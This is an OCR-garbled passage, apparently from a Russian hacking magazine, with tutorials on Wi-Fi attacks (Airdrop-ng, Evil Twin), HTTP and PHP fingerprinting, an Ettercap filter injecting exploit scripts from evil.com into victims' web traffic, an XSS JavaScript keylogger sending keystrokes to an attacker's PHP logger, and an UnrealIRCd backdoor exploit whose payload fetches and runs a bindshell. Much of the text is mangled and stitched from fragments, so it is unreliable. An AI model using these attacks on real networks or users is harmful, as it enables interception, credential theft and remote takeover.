ной антенны, ѴѴі-Рі СІЭВ-модуля, к которому можно подключить 
антенну, диска с записанным Васкігаск’ом и подробной иллю- 
стрированной инструкции о том, как подобрать ключ с помощью 
утилит Эроопѵѵер/Эроопѵѵра. Собрать такой комплект ничего 

не стоит самому. Плавное — приобрести беспроводный модуль; 
дешевле всего он обойдется, если покупать на известной китай- 
ской онлайн-барахолке беаіехігете.сот . Что касается антенны, 
то ее вообще можно сделать самому по схемам с сайтов пад.ги 
и 1ап23.гц . 

2. Не в пример Китаю, в Штатах продается девайс, кото- 
рый намного более технологичен — это ѴѴіРі Ріпеарріе (ѴѴіРі 
Ріпеарріе). В двух словах — это хардварная реализация атаки 
Родие АР. Внутри небольшого игрушечного ананаса размещает- 
ся точка доступа с хитрым софтом, который «заманивает» клиен- 
тов и снимает трафик. Автономная работа «ананаса» достигает- 
ся за счет 4-х пальчиковых батареек. Стоимость такой игрушки 
составляет $144, но разработчиками только приветствуется, 
если люди собирают девайс сами. В качестве основы взята 
дешевая точка доступа Роп 2100 [ уууууу.Ьп.сопп ] с беспроводной 
картой на чипсете АіЬегоз, держатель для батареек из онлайн- 
магазина радиотехники ( ЬіПІѵ/опоП'зѵѵКсІі ). а в качестве ПО 
используется специальная версия утилиты КАРМА — Оазадег 
[ ѵѵѵѵѵѵ.бідіпіп]а.огд/]а5адег ]. На сайте ѵѵѵѵѵѵ.Ьак5.огд/ѵѵ/іпбех.рЬр/ 
Оазадег даже приведена подробная инструкция по сборке и 
настройке. 



а (а11оѵ7) /Ьззісі тас(ог ' апу ' ) | сІіепС тас(ог ' апу ' ) 
или 

(і (сіепу ) /Ьззісі тас(ог 'апу') | сІіепС тас(ог 'апу') 

По умолчанию Аігбгор-пд пропускает весь беспроводной трафик, что 
не сильно весело. 

Возьмем для примера простое правило: 6/00-1 1 -22-33-44-55|апу. Оно 
будет запрещать любым (апу) клиентам подключаться к точке доступа, 
у которой МАО-адрес — 00:1 1 :22:33:44:55. Вместо целого МАО'а можно 




Подставная точка доступа 



► 036 
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клиенту. К примеру, так можно ограничить возможность 
ѴѴі-Рі для всей продукции Арріе: сІ/апуІАррІе. Еще одна 
особенность: в параметре сііепі: может быть указан список 
из разных МАС-адресов, например, 11:22:33:44:55:66,00: 

1 1 :22:33:44:55, 55:44:33:22:1 1 :0. Теперь посмотрим, как это 



выглядит на практике. 



КАК ПОЛЬЗОВАТЬСЯ АІКОКОР-МС 

Аігсігор-пд написан на РуТбоп и требует для работы 
установленный аігосіиппр-пд и библиотеку Еогсоп 1. Но 
если использовать ВаскТгаск, то все необходимое и сама 
утилита без проблем установится из стандартного репо- 
зитория: 



арС-деС ирсіаРе 

арР-деС іпзРаІІ аігсігор-пд 




д- х \ 1^ ~ 1 = а:м> 

в Васкігаск 4 есть и драйверы, и софт для пентеста ѴѴі-Рі 



Схема использования мало чем отличается от знакомых 
нам атак: 

1 ) Первым делом надо перевести ѴѴі-Рі-карту в режим 
мониторинга: 

аігтоп-пд зРагР ѵ^ІапО 

2 ) Далее запустить беспроводный снис|)(|)ер аігобитр, 
сконс^игурировав его вывод в .сзѵ-с^айл: 

аігосіитр-пд сіитррііе --оиРриР-РогтаР сзѵ 
топ О 

3 ) После этого создаем сі^айл с правилами для АігПгор. 
Возьмем для примера описанное выше правило, запре- 
щающее соединения с АР, у которой тас = 00-1 1 -22-33- 
44-55, и запишем его в с|)айл гиіез: 

папо гиіез 

сі/00-11-22-33-44-55 Іапу 

4 ) Все, осталось запустить сам аігбгор-пд, прилинковав- 
шись к С5Ѵ-ВЫВ0ДУ сни(|){^ера и конс^игу с правилами: 

аігсігор-пд -і топО -Р сіитрРіІе . сзѵ -г гиіез 

Утилита начнет свою работу, выводя сообщения об 
отправленных в сеть пакетах. Если помимо прочего 
указать ключ "-Ь", дополнительно будет выводиться под- 
робный отчет. В результате на консоль будут выводиться 
сообщения, каким клиентам и где было разрешено или 
запрещено соединение. Как я уже сказал, условия могут 
быть намного более гибкими, это достигается с помощью 
каскада правил: 

#АІ1оѵ\[-правило 

а/ 00-11-22 -33 -44 -55 155-44-33-22-11-00 

#Вепу-правило 
сі/00-11-22-33-44-55 Іапу 

Таким образом, мы разрешаем доступ к точке клиенту с 
МАС-адресом 55-44-33-22-1 1 -00, в то время как для всех 
остальных соединение по-прежнему останется недо- 
ступным. Получается, Аігбгор-пд можно использовать как 
простейшую систему контроля доступа :). И это без какого- 
либо доступа к админке точки! 



ЕѴІІ ТѴѴШ8 Ѵ2.0 

Опытные умы, наверное, уже догадались, какие возможно- 
сти предоставляет Аігбгор-пд в плане проведения МІТМ- 
атаки. Раз мы можем влиять на то, с какими АР имеет 
возможность работать беспроводной клиент, никто не 
мешает направлять его подключения к нашей особенной 
точке доступа, а на ней снис|)ать весь проходящий трас|)ик. 
Человек видит на ноутбуке сеть «Егее ѴѴі-Еі», подключает- 
ся к ней и никогда не подозревает, что это вовсе не точка 
доступа заведения, в котором он находится, а подставная 
АР-шка, развернутая на ноутбуке с соседнего стола. Атака 
ЕѵіІ Тѵѵіпз (или Родие АР) известна еще с 2004 года и 
основывается на небезопасном поведении беспровод- 
ных клиентов. В людном месте с помощью специального 
софта поднимается точка доступа, которая отвечает на все 
ргоЬе-запросы, в которых клиент просит отозваться точки 
доступа с указанными параметрами. Фальшивой точке, 
как правило, устанавливается Е55Ю той беспроводной 
сети, которая легитимно развернута внутри помещения, 
поэтому клиент, ничего не подозревая, подключается к 
ней. Раньше многое зависело от уровня сигнала, кото- 
рый ты можешь предложить: чем он выше, тем больше 
шансов, что клиент подключится именно к твоей точке 
доступа. Сейчас же, когда появился способ насильно 
подключить клиента к своей АР, эта атака выводится на 
совершенно новый уровень. Для последнего потребуется 
АігсІгор-пд и два правила, запрещающие соединение с 
любыми АР, кроме фейковой (пусть у нее ІР будет равен 
00:аа:ЬЬ:СС:с1с1:ее): 

а/00 : аа :ЬЬ : сс : (і(і: ее I апу 

(і/апу I апу 

Далее дело за традиционным софтом для проведения 
атаки Родие АР. Методика впервые была реализована в 
тулзе КАРМА еще в 2004 году. Позже проект был реализо- 
ван как модуль МеФзрІоіІ:, и получившийся Кагтеіазріоіі 
( ЬіЕІѵ/КагтеІазрІоіІ: ) сейчас является одним из наиболее 
удачных решений для проведений атаки. Подробности 
использования доступны на сайте проекта. Пригодится 
также опыт разработчиков АігсІгор-пд, который можно 
почерпнуть из их презентации на ЗЬтоосоп ( ѵѵѵѵѵѵ. 
зЬтоосоп.ога/2010/з[ібез/ѵѵі5ЬоппЬ.2Ір ]. Хотя есть и другой, 
более простой и изящный способ — воспользоваться спе- 
циальным девайсом, о котором ты можешь прочитать во 
врезке. Но он по понятным причинам и более дорогой. пг 




> ІП^О 

Вся информация 
представлена 
исключительно в 
ознакомительных 
целях. Вмешатель- 
ство в работу чужой 
беспроводной сети, 
во-первых, может вы- 
звать недовольство ее 
хозяина, а, во-вторых, 
нарушаетУК РФ. Имей 
голову на плечах. 
Автор и редакция за 
твои действия ответ- 
ственности не несет. 
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• Реакция сервера в 
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ны запроса; 

• И прочее . 
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РЕШЕНИЕ: 

В недавнем номере][была хорошая статья, в которой описанатема со- 
крытия/изменения баннеровдля различных сервисов, будьто РТР- или 
НТТР-сервер. Но, чтобы ты был всесторонне вооружен, поведаютебе о 
более продвинутых методах детекта ПО. В этом номере о НТТР-серверах. 
Конечно, строчка «Вегѵег» в заголовке — это хорошо. Но на нее слишком 
легко повлиять. Что же у нас есть еще? Достаточно многое. Суть в том, 
что разные веб-серверы по-разному поступают в различных ситуациях. 
То есть мы посылаем различныезапросы серверам, а они по-разному 
отвечают. В основном это связано с неопределенностями РРС и/или 
отклонением от них. Поэтому можно составить определенные отпечатки 
(Рпдегргіпі:) каждого НТТР-сервера, иногда до конкретной версии. 

Есть и пассивные методы, и активные. Активные — болееточные, но 
требуют посыла (не)стандартныхзапросов, которые можно обнаружить. 
Вотнекоторые способы фингерпринта: 

• Порядок полей в ответе НТТР-сервера; 

• Различные ответы сервера на запросы вида: 

ВЕНЕТЕ / НТТР/1.0 — «запрещенный» метод; 

СЕТ / НТТР/3 . о — «новый» версия протокола; 

СЕТ / НАНА/ 1.0 — нестандартный протокол; 

НЕАВ / — некорректный запрос; 

И так далее. 

• Различия в порядке слов , регистре в различных ответах 
веб-сервера; 

• Различные тексты ошибочных (404, например) страниц; 



То есть, на первый взгляд, способов очень много. 

Таким образом, мы можем достаточно точно выделить отпечаток каждого 
веб-сервера. 

Общая идея, я думаю, понятна. На практике же есть множество тулзов. 
Например, Ьиргіпі: под ѵѵіп/піх и входящий в ВТ 4 [ пеі-здиаге.согш/ 
Ьиргіпі:/ ], опенсорсный Ьиргесоп под ѵѵіп [ сотри1:ес.сЬ/рго]ек1:е/ 
Ьиргесоп/ . Поговаривают, что одна из лучших :). Обе приложены на 
диске. 

Разница между ними, в основном, в количестве и качестве используе- 
мыхтестов и логике, по которой они определяют важность «прохожде- 
ния» веб-сервером какого-то теста. Ведь понятно, что точность опреде- 
ления версии сервера по отпечаткам имеетвероятностный характер и 
во многом основывается на методе выставления оценокза прохождение 
каждого из тестов, проводимых программой. 

Кстати, даже с учетом глубокого изменения каких-то характеристик веб- 
сервера, определить версию можно. Например, есть пеі-здиаге.сот/ 
Ьиргіпі/Ьиргіпі рарег.ЫтІ для модуля ЗегѵегМазк к 115. 

Есть также и онлайн-о|эингерпринтер веб-серверов (и не только) — это 
ѵѵѵѵѵѵ.пеІсгаІ'Есопп . 

Дальнейшие примеры приводить не буду — проги слишком просты. 

Но для более четкого понимания (лучше один раз потрогать, чем 1 00 
раз увидеть :)) советую поиграться с любой из этих программ и каким- 
нибудь снио|эфером. Серверы можно найти на зЬобапЬд.сопп . Теорию 
на простых примерах можно почерпнуть тут — иіепі.тигкугос.сот/ 

Итар/ . База ответов на различные запросы — сотри!ес.сИ/рго|ек!е/ 
И1!ргесоп/?з=ба!аЬазе . 

Следуеттакже упомянуть, что НТТР-фингерпринточень нежелательно 
проводить через НТТР-прокси, так как последний можетсильно изме- 
нить ответ от сервера. 
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ЗАДАЧА: ОПРЕДЕЛИТЬ ИСПОЛЬЗОВА- 
НИЕ РНР И ЕГО ВЕРСИЮ НАУДАЛЕННОМ 
СЕРВЕРЕ. 



РЕШЕНИЕ: 

Задача нетрудная, но в некоторых случаях бывает необходима. К 
примеру, когда на серверах часто юзают тосІ_геѵѵгі1:е (если не в теме — 
оченьлаконично описано на Википедии в статье «ЧПУ_Интернет»). 
Зачем версия? К примеру, сам РНР имеет внутренние уязвимости, 
которыми можно воспользоваться. В этом можно убедиться, порыскав 
на ехрІоіІ-сІЬ.сопп . Можно посмотреть заголовок от веб-сервера, где 
наряду с его баннером может быть и инфа о РНР. 



1 с Ы:І:р://ѵкопІ:акІ:е.ги/?=РНРЕ9568Р36-0428-1 ІЙ2-А769-ООА 


©С'- в 


ЬИр;//укопЬаЙ8.ги/?=РНРЕ9568Р36-04гЗ-1182-А7: 


Файл Правка 


Вид Избранное С^вис Справка 


^ Избранное 

1 


13 ЬЬф:/;ѵкопЬакЬе.ги;?=гРНРЕ9568Р36-0428-. . . 




Но есть другой забавный способ. Аименно — «пасхальные яйца» от 
создателей РНР. Причем они применимы клюбым РНР-скриптам, 
даже с ошибками в стиле Раіаі Еггог. Пишем любой из пунктов к любо- 
му скрипту: 

скрипт.р1ір? = РНРЕ95б8РЗб-В42 8-11(І2-А7б9-00АА0 0ІАСР42 
скрипт.р1ір? = РНРЕ95б8Р34-В42 8-11(І2-А7б9-00АА0 0ІАСР42 
скрипт.р1ір? = РНРЕ95б8Р3 5-В42 8-11(І2-А7б9-00АА0 0ІАСР42 
скрипт. р]тр? = РНРВ8В5Р2А0-ЗС92 -11(33 -АЗА9-4С7В0 8С1000 О 
скрипт . р]тр? = 31ШО85б7Р54-В42 8-14(32-А7б9-00ВАЗ 02А5РІ8 

Первый — забавная картинка, второй — лого РНР, потом лого 2 ЕМ В, 
список авторов, лого отЗиЬозіп (добавка к РНР). Причем отображе- 
ние первого пункта сильно меняется в зависимости от версии РНР. 
Соответствие и описание «почему онотак» можно найти на ѵѵѵѵѵѵ.ОрЬр. 
сот/рЬр еазіег едд.рЬр . 

Жаль, что отключается эта фича тем же, чем и добавление в ответ 
сервера заголовка оРНР,аименно — установкой «ехро5е_рЬр=о1'Н> в 
рЬр.іпі. 




Корявый значок н~ ш 



[Забавные картинки в РНР 




ЗАДАЧА: ПОДСУНУТЬ ЖЕРТВЕ СВОЙ 
СПЛОЙТ, ИСПОЛЬЗУЯ ФИЛЬТРЫ 
ЕТТЕРСАР. 



Для точности буду рассказывать о консольной версии Еиегсар, входя- 
щей в ВаскТгаск 4. 

Приступим. Создаем текстовый файлик«Ы:1:р_биег.1:х1:» и пишем в него 
следующий код — фильтр на НТТР-трафик. 



РЕШЕНИЕ: 

Продолжутему атак обычных юзеров. Ситуация та же — «доступен»только 
браузер пользователя, а нам требуется «заставить» перейти его на нашу 
страницу с эксплойтом. Представим, что мы находимся с ним водной 
подсети, так как нам снова понадобится возможность доступ а ктрафику. 

Но на сей раз воспользуемся такой хорошей вещью как«Еі;1;егсар МС». Что 
приятно — есть и 61Л ’шный интерфейс, и консольная версия. Последняя 
версия — 0.7.3. На сайте еие^'сар.соигсеЬгае.пеІ есть исходники как под 
разныевиды піх’ов,таки подвинду. В общем, это сниффер, наделенный 
важными и нужными для нас возможностями. В их число входят: 

• Вынимание и, если надо, расшифровывание логинов и па- 
ролей к большому числу протоколов; 

• Модификация передаваемых в обоих направлениях пакетов; 

• Проведение Ман ін Щте Міббіе атак (МібМ) ; 

• Пассивный анализ трафика с фингерпринтом ОС, сервисов 
хостов . 

Ктомуже, ЕПегсар расширяетсвой функционал за счет всевозможных 
плагинов. 

Но для данной задачи нам потребуются его возможности по поиску и 
модификации данныхТСР/ІР-пакетов на «живом»трафике. 

Общая идея такова: во-первых, получаем доступ ктрафику; во-вторых, 
устанавливаем фильтр для ЕПегсар’а на модификацию НТТР-ответов 
от серверов, куда жертва заходит. Модификация будет заключаться в 
добавлении либо сплойта, либо ссылки на сплойт. 



//Если протокол - ТСР, удаленный порт - 80 
І1 (ір.ргобо == ТСР && Сср.бзб == 80) { 



ІЕПегсарМО. Предварительное сканирование подсетки и начало атаки.| 
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//Ищем строку 

і:Е (зеагсИ (ВАТА. (іаИа, "Ассер^-Епсосііпд" ) ) { 

//Заменяем на мусор 

геріасе ( " АссерЕ-Епсосііпд" , "ВІаЫа-ВІаІіЫаІі" ) ; 

//Мессага для нас 

тзд ( " АссерЕ-Епсосііпд :Еіе1сі Иаз Ьееп с1іапдесі\п" ) ; 

} 

} 

//Если протокол - ТСР, исходящий порт - 80 
(ір.ргоВо == ТСР && Вер. зге == 80) { 
геріасе ( "</Ьосіу>" , " <зсгірр Еуре=\ "ЕехЕ/з'аѵазсгірДХ " 
згс=\ "ИРЕр : //еѵіі . сот/зріоів . з' з\ "></зсгірР> \" "); 

// Меняем ответ сервера - НТМЕ-страницу , подставляя 
какой-то свой сплойт 
геріасе ( "</1іРт1 >" , 

" <ітд згс=\ "ИРРр : //еѵіі . сот/еѵіі . ді1\ " ></ітд>" ) ; 
тзд ( " Зиссезз ! \п" ) ; / /Мессага для нас 

} 

Для создания фильтров к ЕИегсар существует примитивный «язык», 
которым мы и воспользовались. Здесь мы создали два «правила». 
Первое применяется к пакетам, отправленным на 80 порт по протоколу 
ТСР. Обычно это запросы браузера на открытиетой или иной страницы 
веб-серверу. В них ищем строчку «Ассері-Епсобіпд» (поле стандарт- 
ного НТТР-заголовка, посылаемого браузером) и меняем ее на любой 
другой тексттого же размера (это важно). Требуется это, потому что 
обычно в «Ассер1;-Епсобіпд»указывается, что ответы от веб-сервера 
можно сжимать. Но по сжатым данным мы не сможем провести необхо- 
димое нам изменение НТМЕ-страниц. Поэтому мы меняем это поле на 
что-нибудь другое. Сервер же при разборе пропустит это кривое поле 
и ответит нам в несжатом виде. Второе правило применяется уже к 
принимаемым данным. Ситуация похожая. Делаем выборку пакетов от 
веб-сервера (протокол ТСР, исходящий порт — 80).Именяем строчки 
«</Ьобу>», «</Ы:пп[ >» на либо яваскриптовский, либо рисунок-сплойт, 
не суть важно. Почему именно эти теги будем менять? У них есть один 



плюс — они присутствуют почти на всех НТМЕ-страничках в единичном 
числе, что повыситшансы на успешную эксплуатациюуязвимости при 
малом количествезапросов кнашему серваку. Но все зависит от ситуа- 
ции, браузера жертвы и т.д. Еще пара моментов: функция «геріасе» 
регистрозависима, то есть можно повторить искомые строчки в разных 
регистрах, а функция «тзд» выводит нам сообщения в логах, чтобы мы 
знали, когда правило задействовалось. 

Далее требуется переварить наш текстовый файл с фильтром в удобо- 
варимый для Еиегсар’а вид. Пишем в консоли: 

еРРегІіІРег 1іРРр_1іІРег . РхР -о 1іРРр_1іІРег . е1 

Где бир_Еиег.1:х1; — наш файл с фильтром, а в «-о Ы:1;р_Шег.еЕ>указы- 
ваем имя будущего Еиегсар-фильтра (необязательная опция). 

Далее запускаем сам Еііегсар. 

еРРегсар -Т -Е 1іРРр_1іІРег . е1 -М АКР /192.168.0.1/ 

Где опция «-Т» указывает на то, что мы запускаем текстовую версию 
Еиегсар: «-Р Ыір_ЛІІег.еЬ> — подключаем полученный от ЕиегЕЕег 
фильтр: «-МАРР/192.168.0.1/» — указываем Еиегсар, что требуется 
запустить МііМ атаку, а именно — агр-спуфинг (в Еиегсар входит еще 
несколько классических атак). 192.168.0.1- ІР шлюза. Кроме встро- 
енности, бонусы использования встроенного агр-спуффинга еще и в 
том, что после своей работы сниффер восстанавливает АР Рта блицы, 
посылая правильные значения, к тому же не надо заморачиваться с 
редиректами. В итоге Еііегсар будет фильтроватьтрафик от нашей 
жертвы, добавляя в конец каждой НТМЕки наш сплойт. Как понима- 
ешь, Еиегсар — тулза крутая. Особенно с возможностями фильтров, а 
они широки. Это и изменение, декодирование пакетов, и использова- 
ние регекспов, и запуск команд... Основную инфу можно почерпнуть 
из тап’ов и прилагаемых к Еиегсар’у примеров. Кстати, если будешь 
разбираться с этой тулзой, то помни, что она не сниффит трафик, 
посылаемый машиной, на которой она установлена. 




ЗАДАЧА: ОБЛЕГЧИТЬ СБОР 
ИНФОРМАЦИИ. 



РЕШЕНИЕ: 

В своих околохакерских или житейских делах мы часто сталкиваемся 
с необходимостью поиска информации. Будьто сбор информации о 
каком-то сервере или поиски какого-то эксплойта (или поиски любви :)). 
Я уверен, что каждый из нас имеет кучку закладок косновным ресурсам 
для этого. Также есть всевозможные плагины для ускорения этого дела. 
Но в обоих случаяхты привязываешься копределенному компьютеру/ 
софту (особенно когда пользуешься разными браузерами). Есть, конеч- 
но, решения этой трудности, но... Хочу поделиться находкой, которая 
чрезвычайно порадовала меня — сервис на Шр://ѵеЬд.пеІ:/д . По сути, 
это агрегатор кучи всевозможных поисковых (и нетолько) систем. 

Ввел что-то в строку поиска и снизу увидел выборку с гугла, один клик 
— и уже с вики. Но это не было бы настолько интересно, если бы не две 
вещи. Во-первых, уебд — это хакерская группа, потому и сервиезаточен 
подзадачи, связанные с информационной безопасностью. Поэтомутути 
поисковики по сплойтам, уязвимостям, и всяческие ѵѵбоіз’ы да портска- 
неры, кодеры/декодеры и т.д. Кстати, очень советую просмотреть весь 
набор сайтов. Подборка действительно хороша, на все случаи жизни, 
какговорится. Можно что-то для себя выделить, запомнить. 

Второй же плюс заключается в том, что это — общедоступный «веб-аг- 
регатор» поисковиков ( дози.рі/ѵѵза/ ). Он очень простой, таккакисполь- 
зуеттолько 9аѵа5сгір1: и фреймы. То есть может работать даже локально и 
не привязан кбраузеру. 



Поэтому его можно быстро и легко настроить под себя. 

Для того, чтобы добавить какой-то поисковик, требуется всего лишь 
вставить строчку в НТМЕку агрегатора. Например, добавим поиск по 
сайту журнала. Ищем и добавляем: 

САТЗ["Сепега1"] = { 



При крученный поиск по сайту ха кер.ги) 




КУДА ВЛОЖИТЬ ДЕНЬГИ? 



Журмиш Ікмосп) Форум Оипео ЦІФ Хакер Імѵ 

ВцІУаск Сіаіъя Блог Помсі БпсИк 







► 040 
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"хакер" : "кЬРр: / /ш'Лл7. хакер . ги/іосаі/зеагск/зеагск. 
азр?РехЬ=%з " , 

}; 

Где %5 — место, куда будет вставляться та строка, которую ты ищешь. 
В итоге в категории «6епега[»у нас появится пункт«хакер». Все 
просто. Причем можно ввести дополнительный текст или параметры 
кзапросу. Какэто сделано, например, в поиске сплойтов по гуглу, где 



добавляется к введенному запросу «(ѵи [пега Ькку ог ѵиІпегаЬіІкіез) 

ОВ (ехріоііз огзесигііу Ьоіез)», и в итоге нам надо вводить только 
название ПО. 

Версия агрегатора, используемая УЕН6, явно более продвинутая, 
чем от разработчика. Там есть и многострочное окошко для запроса, 
и возможность редактирования итогового запроса. Ктому же по 
основным сайтам поискуже организован. Хотя она и с «мусором» 
(реферы на группу), удалить его не составиттруда. В общем, на 
диске приложена именно она. 




ЗАДАЧА: УКРАСТЬ ЛОГИН, ПАРОЛЬ 
ПОСРЕДСТВОМ Х55 И КЕЙЛ ОГГЕРА. 



РЕШЕНИЕ: 

Х55 бывают разные: активные, пассивные. Первые, конечно, более опас- 
ны, так как остаются на серваке, но и со вторыми можно кое-что сваять. 
Что оченьхорошо для нас — Х55-уязвимости чрезвычайно распростра- 
нены. Это связано и со сложностями защиты от них, но что важнее — с 
общим отношением кним, дажеуспециалистов в области ИВ. Ведь мно- 
гие не считают Х55за юзабельную уязвимость! Давай посмотрим. Как 
насчет кейлоггера через Х55? Примитивный кейлоггер состоит из двух 
компонентов: самого ^аѵа5сгір[’а, отвечающего за перехват нажатий и 
отправку данных о них, ну и сервера, который будет принимать и сохра- 
нять данные. Потому нам требуется левый (можно бесплатный) сервакс 
поддержкой, например, РНР. ^аѵа5сгір[ (код с іпзапезесигкѵ.іпіо ): 



ѵаг кеуз= ' ' ; //определяем переменную 
(коситепк . опкеургезз = Пипскіоп(е) { 

/ /перехватываем нажатия 

дек = 'ыіп(іо\л?. еѵепк?еѵепк : е; //перехватываем событие 
кеу = дек . кеуСобе?дек . кеуСобе : дек . скагСобе; 

//получение кода нажатой кнопки 
кеу = Зкгіпд. кготСкагСобе (кеу) ; //перевод кода в норм вид 
кеуз+=кеу; //кучкуем нажатия в строчку 

} 

ѵ^іпбоѵ^. зекіпкегѵаі ( кипскіоп ( ) { 

/ / отправляем данные через временные промежутки 
пеѵ\[ Ітаде ( ) .зге = ’кккр: //твой_хост: 80/кеу1оддег . 
ркр?кеуз= ' +кеуз ; //передаем данные скрипту 
кеуз = ' ' ; //сбрасываем переменную 
} , 1000 ) ; 



Логика такова: скрипт перехватывает нажатия клавиш и сохраняет их в 
переменную, а через определенные промежутки времени коннектится к 
нашему РНР-скрипту, передавая полученную переменную в запросе. 
Далее заливаем на сервер РНР-скрипт: 

<?ркр 

$1од= $_ЗЕКѴЕК[ "СиЕКУ_ЗТКІЫС" ] . "\г\п" ; 

/ / получаем данные от з з 

$кр=кореп ( " Іод . кхк " , "а"); / /создаем файл на хостинге 
крикз($кр, $1од) ; //заполняем его 
ксіозе ( $кр) ; 

?> 

В зависимости отситуации, пихаем либо сам код, либо ссылку на него 
через Х55 на сервер или пользователю. Теперь все нажатия клавиш 
пользователя на странице с нашим яваскриптом будут сохранены на 
нашем сервере. 

Но это был скорее показательный пример. 

Качественный яваскрипт-кейлоггерты можешь взятьс зоигсеЬгде . 
пе[/рго]ес[5/]5кеу[оддег/ (либо на диске). Версия 1.4. Сутьздесьта же — 
скрипт и сервер. Но реализация гораздо лучше: при сохранении лога 
отмечается поле, в которое вводились данные и уникальный 10 ввода 
данных, такчто с парсингом нетвообще никаких проблем. Несколько 
странно, что сервер здесь реализован в виде ехе’шника на питоне. Но 
перенос на РНР, например, проблем вызвать не должен. В архиве также 
прилагается пара примеров, все очень показательно. Один существен- 
ный минус данного логгера — нет поддержки русского языка. Но ее, я 
думаю, нетрудно будет прикрутить. Использование кейлоггера не всегда 
возможно и не всегда оправдано. Но в определенных случаях мы можем 
получить большие бонусы, чем, например, от классической кражи куки- 
сов,таккакданные мы получаем неизмененные, незашифрованные. Так 
что стоить помнить о та кой штуке. 



ІзкеуІоДДегѵІ .4 вработе: ІР, уникальный ІР, имена полей и перехваченный вводданныі^ 



I 




1 “ Ѵ/іпёо^ѣ ІпЬегпеІ: Екріогег 




СУ 



1^ С:\ОоситепЬ5 апсі 5еШпд$\1 



Файл Правка Вид Избранное Сервис 



< 5 ^ Избранное ^^Тезі: 1 
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ЕХРЫІТЗ 

КЕѴІЕѴѴ 




Г8 


1 





ОБЗОР ЭКСПЛОЙТОВ 

Несмотря на то, что все больше и больше разработчиков в курсе проблем 
информационной безопасности, уязвимости находятся все чаще и чаще. 
Зато зксплойты становятся все сложнее и сложнее. То есть, если раньше 
достаточно было просто найти уязвимость, то теперь еще надо понять, как 
ее реализовать в виде зксплойта. Времена меняются. Теперь зто не только 
зІаІе-оЬагІ, но также и бизнес, и криминал. Но и там и там по обе стороны 
баррикад есть талантливые и умные люди, результат работы которых 
представлен здесь, на зтих страницах. 



ЕХР1ШТ5 

КЕѴІЕѴѴ 




ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО 
КОДА ЧЕРЕЗ БЭКДОР В УМКЕАЬ ІКСО 

ПИЗ 

СѴЕ-2010-2075 



ТАРСЕТ5 



• ипгеаИКСОѵ.3.2.8.1 

Начнем сегодняшний обзор с проблемы в известном ІНС-демоне — 
и пгеа И НС О. Да, еще не так давно I НС было для нас всех важнейшим 
каналом общения. В те времена еще не существовал ни РасеЬоок, ни 
Тѵѵіиег, и люди охотно обменивались байтами в консольном режиме. С 
тех пор утекло не так много воды, и поэтому ІНС — по-прежнему полно- 
ценный и популярный сервис. 

И тем обиднее/веселее (нужное подчеркнуть), что некие злодеи, 
видимо, фанаты ѴѴЕВ 2.0, желающие захватить мир, внедрили бэкдор 
(ВаскВоог — черный вход) в исходные коды дистрибутива Спгеаі ІВСВ. 
«Затрояненная» версия ІВС-демона лежала на зеркальных серверах 
ажс ноября 2009 года по июнь нынешнего года. Надо полагать, что 
за это время множество добрых и честных людей успели установить 
данное ПО. Этот факт был обнаружен создателями демона, о чем они 
со множеством извинений и донесли до широкой общественности. 



ЕХРЮІТ 



Широкая общественность пожелала создать эксплойт, который 
использует бэкдор в Спгеаі ІВСВ, для своих корыстных целей. Даже в 
состав МеІазрІоіПа добавили соответствующий модуль. 

Посмотрим, что же представляет собой этот бэкдор. Как оказалось, 
сам бэкдор — это четыре строчки в исходных кодах, первым делом 
были добавлены две строчки в модуль 5_Ьзс. с, в функцию геас1_ 
раске1:(). Эта функция читает и обрабатывает все входящие пакеты. 
Считанные данные помещаются в переменную геабЬик Сразу после 
того, как данные были считаны из сокета, в дело вступают силы зла, а 
вернее, две строчки, внедренные в эту милую функцию злоумышлен- 
никами: 

#і^(аеп вЕвисмовЕЗ 

ІП ( Ітетстр (геайЬиП, ВЕВВСМОВЕЗ_ІЫЕО , 2)) 



ВЕВВСЗ_ЕОС(геасЗЬиП) ; 

#еп(іі:Е 

Тут идетсравнение первыхдвух байтсчитанных данных с некими 
статическими байтами, определенными за □ЕВибМООЕЗ_1МРО (если 
определен ПЕВСбМОПЕЗ). Если байты совпадают, то далее считанные 
данные переходятв □ЕВибЗ_ЕОС(). Что же этоза определения? А это 
на самом деле макросы, добавленные в файл зШисЕб. 

#(ЗеТіпе ВЕВВеМОВЕЗ ( (х) ->^1адз & ЕЕАСЗ_ЫОЕАКЕЕАС) 

#І^СІеТ ВЕВВеМОВЕЗ 

#ВеПіпе ВЕВВСМОВЕЗ_ІВЕО "АВ" 

#ВеТіпе ВЕВВСЗ_ЕОС (х) ВЕВВСЗ_ВОЕОС_ЗУЗТЕМ (х) 

#ВеТіпе ВЕВВСЗ_ВОЕОС_ЗУЗТЕМ(х) зузВет(х) 

Резюмирую увиденное: при считывании каждого входящего пакета 
бэкдор сравнивает первые два байта данных с последовательностью 
«АВ». Если совпадение есть, то содержимое данных передается вызо- 
ву зузІетО, то есть на исполнение в операци он ку. 

Эксплойт: 

# ! /изг/Ьіп/регІ 

# ВпгеаІЗ . 2 . 8 . 1 КетоВе Воѵ^піоасіег /ЕхесиВе Тго^'ап 

# ВО ВОТ ВІЗТКІВВТЕ -РКІѴАТЕ- 

# -іНар (218) 

изе ЗоскеВ; 
изе ІО : : ЗоскеВ ; 

## Рауіоасі орВіопз 

# Различные «нагрузки». По сути команды — это любые 

# команды для оболочки ипіх/ііпих, начинающиеся с 
«АВ ; » . 

# Первые два байта гарантируют, что бэкдор передаст 

# все в зузВет() ; - чтобы выполнилась без проблем 

# остальная часть данных. 

ту $рау1оаб1 = 'АВ; об /Втр; ѵ\7деВ ПВВр:// 
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ЮІТ5 

ЕѴѴ 



ЕХРЫІТ5 1 

РЕѴІЕѴѴ 1 1 1 




ЕХРЕОІТЗ 

КЕѴІЕѴѴ 
















ЕХРЮІТ5 

РЕѴІЕѴ1Г 



ЕХРЕОІТЗ 

РЕѴІЕѴѴ 




|СРЦ - ГТИІПІ ІЕНгеагІ гПоіЛцІ^ ЕІ 



Нк Ѵкм ОеЬц^ РІУЗ^м ІтлпІіЬ Орііасій Жтііоѵѵ НеІ|р ^окп 
4^ X Ь \\ %\~П Я ^ е т [ 1 



’ |'07'1 2^]В імкроН аіЕТО'ёі' ёо?'^ 



Еоі амёѳѳео 

еі^ ере,4іМіГ'*'' 



.771Я65СВ 



ВІагеОѴО. «Обработчик» восстанавливает стек ДЛЯ работы РОР 



раскеііз^огтзесигі^у . огд/дгоирз /зуппегду /Ьіпсізііеіі- 
ипіх -О Ьіпйзііеіі; сішіосі +х Ьіпйзііеіі; . /Ьіпсізііеіі &' ; 
